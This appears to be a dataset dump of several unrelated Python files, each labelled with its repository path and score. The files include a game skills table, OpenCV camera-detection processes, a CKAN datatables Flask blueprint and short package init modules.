raise Exception('please specify zenith angle') return Oscillator([survial_atmos_amp], **kwargs) def survival_sterile(ev, dm41=0, ua4=(0,0,0), epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e', lenth=19.3/meter_by_mev): idx = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} ni = idx[nui] nf = idx[nuf] if ni == nf: u = ua4[ni] return 1 - 4 * u * (1 - u) * np.sin(dm41 * lenth / 4 / ev) else: ua = ua4[ni] ub = ua4[nf] return 4 * ua * ub * np.sin(dm41 * lenth / 4 / ev)
2.3125
2
torchio/torchio.py
MonsieurWave/torchio
0
12751787
<reponame>MonsieurWave/torchio<filename>torchio/torchio.py """Main module.""" from pathlib import Path from typing import Union, Tuple, Callable import torch import numpy as np # Image types INTENSITY = 'intensity' LABEL = 'label' SAMPLING_MAP = 'sampling_map' # Keys for dataset samples PATH = 'path' TYPE = 'type' STEM = 'stem' DATA = 'data' AFFINE = 'affine' # For aggregator IMAGE = 'image' LOCATION = 'location' # In PyTorch convention CHANNELS_DIMENSION = 1 # For typing hints TypePath = Union[Path, str] TypeNumber = Union[int, float] TypeData = Union[torch.Tensor, np.ndarray] TypeTripletInt = Tuple[int, int, int] TypeTripletFloat = Tuple[float, float, float] TypeTuple = Union[int, TypeTripletInt] TypeRangeInt = Union[int, Tuple[int, int]] TypePatchSize = Union[int, Tuple[int, int, int]] TypeRangeFloat = Union[float, Tuple[float, float]] TypeCallable = Callable[[torch.Tensor], torch.Tensor]
1.46875
1
src/kol/data/Skills.py
danheath/temppykol
19
12751915
<reponame>danheath/temppykol skills = [ { "id" : "0001", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, "effects" : { "maximumInebriety" : "+5", }, }, { "id" : "0002", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "0003", "name" : "<NAME> <NAME>.", "type" : "Buff", "mpCost" : 5, "isPermable" : False, }, { "id" : "0004", "name" : "<NAME>", "type" : "Buff", "mpCost" : 5, "isPermable" : False, }, { "id" : "0005", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, "effects" : { "maximumFullness" : "+5", }, }, { "id" : "0006", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, "effects" : { "maximumSpleen" : "+5", }, }, { "id" : "0010", "name" : "<NAME>", "type" : "Passive", "effects" : { "itemDrop" : "+10%", }, }, { "id" : "0011", "name" : "<NAME>", "type" : "Passive", "effects" : { "meatDrop" : "+10%", }, }, { "id" : "0012", "name" : "<NAME>", "type" : "Passive", }, { "id" : "0013", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumHP" : "+5%", }, }, { "id" : "0014", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumMP" : "+5%", }, }, { "id" : "0015", "name" : "CLEESH", "type" : "Combat", "mpCost" : 10, }, { "id" : "0019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 40, "isAutomaticallyPermed" : True, }, { "id" : "0020", "name" : "<NAME>", "type" : "Passive", "isPermable" : False, }, { "id" : "0021", "name" : "Lust", "type" : "Passive", "isPermable" : False, "effects" : { "combatInitiative" : "+50%", "spellDamage" : "-5", "meleeDamage" : "-5", }, }, { "id" : "0022", "name" : "Gluttony", "type" : "Passive", "isPermable" : False, "effects" : { "strengthensFood" : True, "statsPerFight" : "-2", }, }, { "id" : "0023", "name" : "Greed", "type" : "Passive", "isPermable" : False, "effects" : { "meatDrop" : "+50%", "itemDrop" : "-15%", }, }, { "id" : "0024", "name" : "Sloth", "type" : "Passive", "isPermable" : False, "effects" : { "damageReduction" : "+8", "combatInitiative" : "-25%", }, }, { "id" : "0025", "name" : "Wrath", "type" : "Passive", "isPermable" : False, "effects" : { "spellDamage" : "+10", "meleeDamage" : "+10", "damageReduction" : "-4", }, }, { "id" : "0026", "name" : "Envy", "type" : "Passive", "isPermable" : False, "effects" : { "itemDrop" : "+30%", "meatDrop" : "-25%", }, }, { "id" : "0027", "name" : "Pride", "type" : "Passive", "isPermable" : False, "effects" : { "statsPerFight" : "+4", "weakensFood" : True, }, }, { "id" : "0028", "name" : "<NAME>", "type" : "Combat", "mpCost" : 120, }, { "id" : "0029", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0030", "name" : "Snowclone", "type" : "Combat", "mpCost" : 120, }, { "id" : "0031", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0032", "name" : "Eggsplosion", "type" : "Combat", "mpCost" : 120, }, { "id" : "0033", "name" : "Mudbath", "type" : "Combat", "mpCost" : 30, }, { "id" : "0036", "name" : "<NAME>", "type" : "Combat", "mpCost" : 120, }, { "id" : "0037", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0038", "name" : "<NAME>", "type" : "Passive", "effects" : { "itemDrop" : "+5%", }, }, { "id" : "0039", "name" : "<NAME>", "type" : "Passive", "effects" : { "meatDrop" : "+10%", }, }, { "id" : "0040", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumHP" : "+10%", }, }, { "id" : "0041", "name" : "<NAME>", "type" : "Passive", "effects" : { "maximumMP" : "+10%", }, }, { "id" : "0042", "name" : "<NAME>", "type" : "Combat", "mpCost" : 120, }, { "id" : "0043", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "0044", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 30, }, { "id" : "1000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "1003", "name" : "Thrust-Smack", "type" : "Combat", "mpCost" : 3, }, { "id" : "1004", "name" : "Lunge-Smack", "type" : "Combat", "mpCost" : 5, }, { "id" : "1005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 8, }, { "id" : "1006", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1007", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 7, }, { "id" : "1008", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1009", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1010", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "1011", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1012", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1014", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1015", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "1016", "name" : "Pulverize", "type" : "Passive", }, { "id" : "1017", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "1019", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "1020", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "2000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "2003", "name" : "Headbutt", "type" : "Combat", "mpCost" : 3, }, { "id" : "2004", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2005", "name" : "Shieldbutt", "type" : "Combat", "mpCost" : 5, }, { "id" : "2006", "name" : "Armorcraftiness", "type" : "Passive", }, { "id" : "2007", "name" : "<NAME>", "type" : "Buff", "mpCost" : 6, }, { "id" : "2008", "name" : "<NAME>", "type" : "Buff", "mpCost" : 10, }, { "id" : "2009", "name" : "Empathy of the Newt", "type" : "Buff", "mpCost" : 15, }, { "id" : "2010", "name" : "<NAME>", "type" : "Buff", "mpCost" : 8, }, { "id" : "2011", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2012", "name" : "<NAME>", "type" : "Buff", "mpCost" : 10, }, { "id" : "2014", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2015", "name" : "Kneebutt", "type" : "Combat", "mpCost" : 4, }, { "id" : "2016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2020", "name" : "Hero of the Half-Shell", "type" : "Passive", }, { "id" : "2021", "name" : "<NAME>", "type" : "Passive", }, { "id" : "2022", "name" : "<NAME>", "type" : "Combat", "mpCost" : 20, }, { "id" : "2103", "name" : "Head + Knee Combo", "type" : "Combat", "mpCost" : 8, }, { "id" : "2105", "name" : "Head + Shield Combo", "type" : "Combat", "mpCost" : 9, }, { "id" : "2106", "name" : "Knee + Shield Combo", "type" : "Combat", "mpCost" : 10, }, { "id" : "2107", "name" : "Head + Knee + Shield Combo", "type" : "Combat", "mpCost" : 13, }, { "id" : "3000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "3003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 4, }, { "id" : "3004", "name" : "<NAME>", "type" : "Combat", "mpCost" : 3, }, { "id" : "3005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 7, }, { "id" : "3006", "name" : "Pastamastery", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3007", "name" : "<NAME>", "type" : "Combat", "mpCost" : 19, }, { "id" : "3008", "name" : "<NAME>", "type" : "Combat", "mpCost" : 35, }, { "id" : "3009", "name" : "<NAME>", "type" : "Combat / Noncombat", "mpCost" : 6, }, { "id" : "3010", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 12, }, { "id" : "3011", "name" : "Spirit of Rigatoni", "type" : "Passive", }, { "id" : "3012", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 20, }, { "id" : "3014", "name" : "<NAME>", "type" : "Passive", }, { "id" : "3015", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "3017", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "3019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 35, }, { "id" : "3020", "name" : "<NAME>", "type" : "Combat", "mpCost" : 1, }, { "id" : "3101", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3102", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3103", "name" : "Spirit of Garlic", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3104", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "3105", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "4000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "4003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 3, }, { "id" : "4004", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4005", "name" : "Saucestorm", "type" : "Combat", "mpCost" : 12, }, { "id" : "4006", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "4007", "name" : "Elemental Saucesphere", "type" : "Buff", "mpCost" : 10, }, { "id" : "4008", "name" : "<NAME>", "type" : "Buff", "mpCost" : 5, }, { "id" : "4009", "name" : "<NAME>", "type" : "Combat", "mpCost" : 23, }, { "id" : "4010", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4011", "name" : "<NAME>", "type" : "Buff", "mpCost" : 10, }, { "id" : "4012", "name" : "Saucegeyser", "type" : "Combat", "mpCost" : 40, }, { "id" : "4014", "name" : "<NAME>", "type" : "Combat", "mpCost" : 4, }, { "id" : "4015", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4017", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "4019", "name" : "Scarysauce", "type" : "Buff", "mpCost" : 10, }, { "id" : "4020", "name" : "Salsaball", "type" : "Combat", "mpCost" : 1, }, { "id" : "5000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "5003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 3, }, { "id" : "5004", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "5006", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5007", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 8, }, { "id" : "5008", "name" : "<NAME>: <NAME>", "type" : "Combat", "mpCost" : 7, }, { "id" : "5009", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5010", "name" : "Overdeveloped Sense of Self Preservation", "type" : "Passive", }, { "id" : "5011", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 12, }, { "id" : "5012", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "5014", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "5015", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5016", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5017", "name" : "Smooth Movement", "type" : "Noncombat", "mpCost" : 10, }, { "id" : "5018", "name" : "<NAME>", "type" : "Passive", }, { "id" : "5019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 8, }, { "id" : "6000", "name" : "<NAME>", "type" : "Noncombat", "mpCost" : 1, }, { "id" : "6003", "name" : "<NAME>", "type" : "Buff", "mpCost" : 40, }, { "id" : "6004", "name" : "<NAME>", "type" : "Buff", "mpCost" : 2, }, { "id" : "6005", "name" : "<NAME>", "type" : "Buff", "mpCost" : 4, }, { "id" : "6006", "name" : "<NAME>", "type" : "Buff", "mpCost" : 7, }, { "id" : "6007", "name" : "<NAME>", "type" : "Buff", "mpCost" : 3, }, { "id" : "6008", "name" : "<NAME>", "type" : "Buff", "mpCost" : 5, }, { "id" : "6009", "name" : "<NAME>", "type" : "Buff", "mpCost" : 13, }, { "id" : "6010", "name" : "<NAME>", "type" : "Buff", "mpCost" : 11, }, { "id" : "6011", "name" : "The Psalm of Pointiness", "type" : "Buff", "mpCost" : 15, }, { "id" : "6012", "name" : "Jackasses' Symphony of Destruction", "type" : "Buff", "mpCost" : 9, }, { "id" : "6013", "name" : "<NAME> Superiority", "type" : "Buff", "mpCost" : 30, }, { "id" : "6014", "name" : "The Ode to Booze", "type" : "Buff", "mpCost" : 50, }, { "id" : "6015", "name" : "The Sonata of Sneakiness", "type" : "Buff", "mpCost" : 20, }, { "id" : "6016", "name" : "<NAME>", "type" : "Buff", "mpCost" : 20, }, { "id" : "6017", "name" : "<NAME>", "type" : "Buff", "mpCost" : 30, }, { "id" : "6018", "name" : "<NAME>", "type" : "Buff", "mpCost" : 9, }, { "id" : "6020", "name" : "<NAME>", "type" : "Buff", "mpCost" : 50, }, { "id" : "6021", "name" : "<NAME>", "type" : "Buff", "mpCost" : 50, }, { "id" : "6022", "name" : "Elron's Explosive Etude", "type" : "Buff", "mpCost" : 50, }, { "id" : "6023", "name" : "<NAME>", "type" : "Buff", "mpCost" : 50, }, { "id" : "6024", "name" : "Prelude of Precision", "type" : "Buff", "mpCost" : 50, }, { "id" : "7001", "name" : "<NAME> To Your Vampiric Urges", "type" : "Combat", "mpCost" : 0, }, { "id" : "7002", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7003", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7004", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7005", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7006", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7007", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7008", "name" : "<NAME>", "type" : "Combat", }, { "id" : "7009", "name" : "<NAME>", "type" : "Combat", "mpCost" : 2, }, { "id" : "7010", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7011", "name" : "Fire Blue Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7012", "name" : "Fire Orange Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7013", "name" : "Fire Purple Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7014", "name" : "Fire Black Bottle-Rocket", "type" : "Combat", "mpCost" : 5, }, { "id" : "7015", "name" : "<NAME>", "type" : "Combat", "mpCost" : 30, }, { "id" : "7016", "name" : "Start Trash Fire", "type" : "Combat", "mpCost" : 100, }, { "id" : "7017", "name" : "Overload Discarded Refrigerator", "type" : "Combat", "mpCost" : 100, }, { "id" : "7018", "name" : "Trashquake", "type" : "Combat", "mpCost" : 100, }, { "id" : "7019", "name" : "<NAME>", "type" : "Combat", "mpCost" : 100, }, { "id" : "7020", "name" : "<NAME>", "type" : "Combat", "mpCost" : 100, }, { "id" : "7021", "name" : "<NAME>", "type" : "Combat", }, { "id" : "7022", "name" : "Ask <NAME>", "type" : "Combat", }, { "id" : "7023", "name" : "Ask <NAME> Rough the Hobo Up a Bit", "type" : "Combat", }, { "id" : "7024", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7025", "name" : "<NAME> You-Eye View", "type" : "Combat", "mpCost" : 30, }, { "id" : "7038", "name" : "<NAME>", "type" : "Combat", "mpCost" : 5, }, { "id" : "7039", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7040", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7041", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7042", "name" : "Rise From Your Ashes", "type" : "Combat", "mpCost" : 20, }, { "id" : "7043", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7044", "name" : "The Statue Treatment", "type" : "Combat", "mpCost" : 20, }, { "id" : "7045", "name" : "<NAME>", "type" : "Combat", "mpCost" : 20, }, { "id" : "7046", "name" : "Give Your Opponent \"The Bird\"", "type" : "Combat", "mpCost" : 20, }, { "id" : "7047", "name" : "Ask the hobo for a drink", "type" : "Combat", "mpCost" : 0, }, { "id" : "7048", "name" : "Ask the hobo for something to eat", "type" : "Combat", "mpCost" : 0, }, { "id" : "7049", "name" : "Ask the hobo for some violence", "type" : "Combat", "mpCost" : 0, }, { "id" : "7050", "name" : "<NAME> to tell you a joke", "type" : "Combat", "mpCost" : 0, }, { "id" : "7051", "name" : "Ask the hobo to dance for you", "type" : "Combat", "mpCost" : 0, }, { "id" : "7052", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7053", "name" : "<NAME>", "type" : "Combat", "mpCost" : 15, }, { "id" : "7054", "name" : "<NAME>", "type" : "Combat", "mpCost" : 15, }, { "id" : "7055", "name" : "<NAME>", "type" : "Combat", "mpCost" : 15, }, { "id" : "7056", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7061", "name" : "Spring Raindrop Attack", "type" : "Combat", "mpCost" : 0, }, { "id" : "7062", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7063", "name" : "Falling Leaf Whirlwind", "type" : "Combat", "mpCost" : 10, }, { "id" : "7064", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7065", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "8000", "name" : "<NAME>", "type" : "Mystical Bookshelf", "mpCost" : 5, }, { "id" : "8100", "name" : "<NAME>", "type" : "Mystical Bookshelf", }, { "id" : "8101", "name" : "<NAME>", "type" : "Mystical Bookshelf", }, { "id" : "8200", "name" : "<NAME>", "type" : "Mystical Bookshelf", "mpCost" : 5, }, { "id" : "8201", "name" : "Summon \"Tasteful\" Gifts", "type" : "Mystical Bookshelf", "mpCost" : 5, }, ]
0.683594
1
src/braket/device_schema/rigetti/__init__.py
kjacky/amazon-braket-schemas-python
17
12752043
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License from braket.device_schema.rigetti.rigetti_device_capabilities_v1 import ( # noqa: F401 RigettiDeviceCapabilities, ) from braket.device_schema.rigetti.rigetti_device_parameters_v1 import ( # noqa: F401 RigettiDeviceParameters, ) from braket.device_schema.rigetti.rigetti_provider_properties_v1 import ( # noqa: F401 RigettiProviderProperties, )
0.839844
1
[archived]/mcmt-tracking-python/mcmt-tracking-python/bin/mcmt/detection_process.py
sieniven/spot-it-3d
8
12752171
import os import sys import csv import cv2 import math import time import numbers import numpy as np from multiprocessing import Process # local imported codes import parameters as parm from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, \ single_cam_detector, multi_cam_detector class SingleCameraDetector(Process): """ Process for single camera detection """ def __init__(self, index, queue, FPS): super().__init__() self.queue = queue self.index = index self.realtime = isinstance(self.index, numbers.Number) self.fps = FPS self.frame_h = None self.frame_w = None self.scale_factor = None self.aspect_ratio = None self.cap = None self.fgbg = None self.detector = None self.video_ends_indicator = 0 self.frame_count = 0 self.frame = None self.good_tracks = None self.origin = np.array([0, 0]) self.tracks = [] self.next_id = 0 def run(self): self.cap = cv2.VideoCapture(self.index) self.frame_w = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)) self.frame_h = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2) self.aspect_ratio = self.frame_w / self.frame_h downsample = False if self.frame_w * self.frame_h > 1920 * 1080: downsample = True self.frame_w = 1920 self.frame_h = int(1920 / aspect_ratio) self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2) self.fgbg, self.detector = setup_system_objects(self.scale_factor) # check if video capturing is successful ret, self.frame = self.cap.read() if ret: if self.realtime: print(f"Video Capture {self.index}: PASS") else: print(f"File Read \"{self.index}\": PASS") else: if self.realtime: print(f"Video Capture {self.index}: FAIL") else: print(f"File Read \"{self.index}\": FAIL") self.cap.release() while self.cap.isOpened(): ret, self.frame = self.cap.read() if ret: self.frame = cv2.resize(self.frame, (self.frame_w, self.frame_h)) self.good_tracks, self.tracks, self.next_id, self.frame = single_cam_detector( self.tracks, self.next_id, self.index, self.fgbg, self.detector, self.fps, self.frame_w, self.frame_h, self.scale_factor, self.origin, self.frame) if cv2.waitKey(1) & 0xFF == ord('q'): break else: self.video_ends_indicator = 1 break self.queue.put((self.good_tracks, self.frame_count, self.frame)) self.frame_count += 1 if self.video_ends_indicator == 1: break self.cap.release() cv2.destroyAllWindows() class MultiCameraDetector(Process): """ Process for multi camera detection """ def __init__(self, filenames, queue, FPS): super().__init__() self.filenames = filenames self.queue = queue self.realtime = isinstance(self.filenames[0], numbers.Number) self.cameras = [] self.fps = FPS self.video_ends_indicator = 0 self.frame_count = 0 self.good_tracks = None self.start_timer = None self.end_timer = None def run(self): for filename in self.filenames: camera = Camera(filename, self.fps) ret, self.frame = camera.cap.read() if ret: self.cameras.append(camera) if self.realtime: print(f"Video Capture {filename}: PASS") else: print(f"File Read \"{filename}\": PASS") else: if self.realtime: print(f"Video Capture {filename}: FAIL") else: print(f"File Read \"{filename}\": FAIL") camera.cap.release() while True: self.start_timer = time.time() sendList = [] for index, camera in enumerate(self.cameras): ret, frame = camera.cap.read() if ret: frame = cv2.resize(frame, (camera.frame_w, camera.frame_h)) self.good_tracks, frame = multi_cam_detector(camera, frame) if cv2.waitKey(1) & 0xFF == ord('q'): self.video_ends_indicator = 1 break else: self.video_ends_indicator = 1 break sendList.append((self.good_tracks, frame, camera.dead_tracks)) # sendList: [(good_tracks_0, frame_0, dead_tracks_0), (good_tracks_1, frame_1, dead_tracks_1), frame_count] sendList.append((self.frame_count)) self.queue.put(sendList) self.frame_count += 1 if self.video_ends_indicator == 1: break self.end_timer = time.time() print(f"Detection process took: {self.end_timer - self.start_timer}") cv2.destroyAllWindows() for index, camera in enumerate(self.cameras): camera.cap.release() with open(f"data_out_{index}.csv", 'w', newline='') as csvfile: writer = csv.writer(csvfile) for row in camera.output_log: writer.writerow(row)
2.15625
2
ckanext/datatablesview/blueprint.py
robin-NEC/ckan
1
12752299
# encoding: utf-8 from __future__ import annotations from typing import Any from urllib.parse import urlencode from flask import Blueprint from ckan.common import json from ckan.plugins.toolkit import get_action, request, h import re datatablesview = Blueprint(u'datatablesview', __name__) def merge_filters(view_filters: dict[str, Any], user_filters_str: str) -> dict[str, Any]: u''' view filters are built as part of the view, user filters are selected by the user interacting with the view. Any filters selected by user may only tighten filters set in the view, others are ignored. >>> merge_filters({ ... u'Department': [u'BTDT'], u'OnTime_Status': [u'ONTIME']}, ... u'CASE_STATUS:Open|CASE_STATUS:Closed|Department:INFO') {u'Department': [u'BTDT'], u'OnTime_Status': [u'ONTIME'], u'CASE_STATUS': [u'Open', u'Closed']} ''' filters = dict(view_filters) if not user_filters_str: return filters user_filters = {} for k_v in user_filters_str.split(u'|'): k, _sep, v = k_v.partition(u':') if k not in view_filters or v in view_filters[k]: user_filters.setdefault(k, []).append(v) for k in user_filters: filters[k] = user_filters[k] return filters def ajax(resource_view_id: str): resource_view = get_action(u'resource_view_show' )({}, { u'id': resource_view_id }) draw = int(request.form[u'draw']) search_text = str(request.form[u'search[value]']) offset = int(request.form[u'start']) limit = int(request.form[u'length']) view_filters = resource_view.get(u'filters', {}) user_filters = str(request.form[u'filters']) filters = merge_filters(view_filters, user_filters) datastore_search = get_action(u'datastore_search') unfiltered_response = datastore_search( {}, { u"resource_id": resource_view[u'resource_id'], u"limit": 0, u"filters": view_filters, } ) cols = [f[u'id'] for f in unfiltered_response[u'fields']] if u'show_fields' in resource_view: cols = [c for c in cols if c in resource_view[u'show_fields']] sort_list = [] i = 0 while True: if u'order[%d][column]' % i not in request.form: break sort_by_num = int(request.form[u'order[%d][column]' % i]) sort_order = ( u'desc' if request.form[u'order[%d][dir]' % i] == u'desc' else u'asc' ) sort_list.append(cols[sort_by_num] + u' ' + sort_order) i += 1 colsearch_dict = {} i = 0 while True: if u'columns[%d][search][value]' % i not in request.form: break v = str(request.form[u'columns[%d][search][value]' % i]) if v: k = str(request.form[u'columns[%d][name]' % i]) # replace non-alphanumeric characters with FTS wildcard (_) v = re.sub(r'[^0-9a-zA-Z\-]+', '_', v) # append ':*' so we can do partial FTS searches colsearch_dict[k] = v + u':*' i += 1 if colsearch_dict: search_text = json.dumps(colsearch_dict) else: search_text = re.sub(r'[^0-9a-zA-Z\-]+', '_', search_text) + u':*' if search_text else u'' try: response = datastore_search( {}, { u"q": search_text, u"resource_id": resource_view[u'resource_id'], u'plain': False, u'language': u'simple', u"offset": offset, u"limit": limit, u"sort": u', '.join(sort_list), u"filters": filters, } ) except Exception: query_error = u'Invalid search query... ' + search_text dtdata = {u'error': query_error} else: data = [] for row in response[u'records']: record = {colname: str(row.get(colname, u'')) for colname in cols} # the DT_RowId is used in DT to set an element id for each record record['DT_RowId'] = 'row' + str(row.get(u'_id', u'')) data.append(record) dtdata = { u'draw': draw, u'recordsTotal': unfiltered_response.get(u'total', 0), u'recordsFiltered': response.get(u'total', 0), u'data': data } return json.dumps(dtdata) def filtered_download(resource_view_id: str): params = json.loads(request.form[u'params']) resource_view = get_action(u'resource_view_show' )({}, { u'id': resource_view_id }) search_text = str(params[u'search'][u'value']) view_filters = resource_view.get(u'filters', {}) user_filters = str(params[u'filters']) filters = merge_filters(view_filters, user_filters) datastore_search = get_action(u'datastore_search') unfiltered_response = datastore_search( {}, { u"resource_id": resource_view[u'resource_id'], u"limit": 0, u"filters": view_filters, } ) cols = [f[u'id'] for f in unfiltered_response[u'fields']] if u'show_fields' in resource_view: cols = [c for c in cols if c in resource_view[u'show_fields']] sort_list = [] for order in params[u'order']: sort_by_num = int(order[u'column']) sort_order = (u'desc' if order[u'dir'] == u'desc' else u'asc') sort_list.append(cols[sort_by_num] + u' ' + sort_order) cols = [c for (c, v) in zip(cols, params[u'visible']) if v] colsearch_dict = {} columns = params[u'columns'] for column in columns: if column[u'search'][u'value']: v = column[u'search'][u'value'] if v: k = column[u'name'] # replace non-alphanumeric characters with FTS wildcard (_) v = re.sub(r'[^0-9a-zA-Z\-]+', '_', v) # append ':*' so we can do partial FTS searches colsearch_dict[k] = v + u':*' if colsearch_dict: search_text = json.dumps(colsearch_dict) else: search_text = re.sub(r'[^0-9a-zA-Z\-]+', '_', search_text) + u':*' if search_text else '' return h.redirect_to( h.url_for( u'datastore.dump', resource_id=resource_view[u'resource_id']) + u'?' + urlencode( { u'q': search_text, u'plain': False, u'language': u'simple', u'sort': u','.join(sort_list), u'filters': json.dumps(filters), u'format': request.form[u'format'], u'fields': u','.join(cols), })) datatablesview.add_url_rule( u'/datatables/ajax/<resource_view_id>', view_func=ajax, methods=[u'POST'] ) datatablesview.add_url_rule( u'/datatables/filtered-download/<resource_view_id>', view_func=filtered_download, methods=[u'POST'] )
1.4375
1
pyload/load.py
lrterry/py-load
0
12752427
class BaseLoadTester(object): def __init__(self, config): self.config = config def before(self): raise NotImplementedError() def on_result(self): raise NotImplementedError()
0.964844
1
segregation/__init__.py
weikang9009/segregation
0
12752555
<filename>segregation/__init__.py __version__ = "1.3.0" """ :mod:`segregation` --- Spatial/Aspatial Segregation Analysis ================================================= """ from . import aspatial from . import spatial from . import inference from . import decomposition from . import util from . import network from . import local from . import compute_all
0.851563
1
cloudkitty-9.0.0/cloudkitty/storage/v2/__init__.py
scottwedge/OpenStack-Stein
0
12752683
